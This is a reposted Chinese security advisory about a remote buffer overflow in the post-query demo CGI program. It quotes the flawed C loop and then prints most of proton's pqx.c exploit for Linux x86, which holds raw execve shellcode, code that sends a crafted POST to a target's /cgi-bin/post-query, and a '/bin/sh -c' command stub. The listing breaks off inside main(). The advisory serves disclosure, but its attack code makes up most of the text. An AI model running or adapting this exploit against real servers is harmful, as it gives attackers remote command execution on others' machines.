post-query 示例CGI程序存在远程缓冲区溢出漏洞
2008-04-09 04:35:27来源:互联网 阅读 ()
发布日期:2001-03-13
更新日期:2001-03-13
受影响系统:
描述:
运行post-query的web服务器
post-query是一个常见的UNIX下的演示CGI程序。它用C语言编写。它存在一个
远程缓冲区溢出漏洞。如果攻击者精心构造一个很大的字符串发送给post-query
时,就可能在目标主机上执行任意代码。
下面是有问题的代码部分:
#define MAX_ENTRIES 10000
typedef struct {
char *name;
char *val;
} entry;
....
main(int argc, char *argv[]) {
entry entries[MAX_ENTRIES];
....
for(x=0;cl && (!feof(stdin));x ) {
m=x;
entries[x].val = fmakeword(stdin,'&',&cl);
plustospace(entries[x].val);
unescape_url(entries[x].val);
entries[x].name = makeword(entries[x].val,'=');
}
....
<* 来源: proton (proton@ENERGYMECH.NET)
http://www.energymech.net/users/proton/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
proton (proton@ENERGYMECH.NET) 提供了如下测试代码:
/*
| pqx.c -- post-query buffer overflow exploit for Linux-ix86
| Copyright (c) 2001 by proton. All rights reserved.
|
| This program is free software; you can redistribute it and/or modify
| it under the terms of the GNU General Public License as published by
| the Free Software Foundation; either version 2 of the License, or
| (at your option) any later version.
|
| This program is distributed in the hope that it will be useful,
| but WITHOUT ANY WARRANTY; without even the implied warranty of
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
| GNU General Public License for more details.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
char tmp[512];
char *host;
char *progname;
char *command;
#define output(x) write(1,x,sizeof(x))
unsigned char shellcode[] =
"\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
"\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
"\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xc0\xff\xff\xff\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x00";
void netpipe(int *rsock, int *wsock, int sz)
{
struct sockaddr_in sai;
struct hostent *he;
int s;
if (!host || !*host || !command || !*command)
{
printf("Usage: %s <host> \"<command>\"\n",progname);
exit(1);
}
he = gethostbyname(host);
if (!he)
{
printf("%s: Unknown host\n",host);
exit(1);
}
s = socket(AF_INET,SOCK_STREAM,0);
sai.sin_family = AF_INET;
sai.sin_port = htons(80);
memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));
if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
{
switch(errno)
{
case ECONNREFUSED:
output("Connection refused.\n");
break;
case ETIMEDOUT:
output("Connection timed out.\n");
break;
case ENETUNREACH:
output("Network unreachable.\n");
break;
default:
output("Unknown error.\n");
break;
}
exit(1);
}
output("Connection established.\n");
*rsock = *wsock = s;
sprintf(tmp,"POST /cgi-bin/post-query HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %i\r\n\r\n",sz);
write(s,tmp,strlen(tmp));
}
void __doit(void);
#define CMDSTUB "/bin/sh -c %s@"
int main(int argc, char **argv)
{
char *q,*cp;
int in,out;
int sz,x,n;
if (argc < 3)
{
fprintf(stderr,"Usage: %s <hostname> \"<command>\"\n",argv[0]);
exit(1);
}
progname = argv[0];
host = argv[1];
command = argv[2];
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash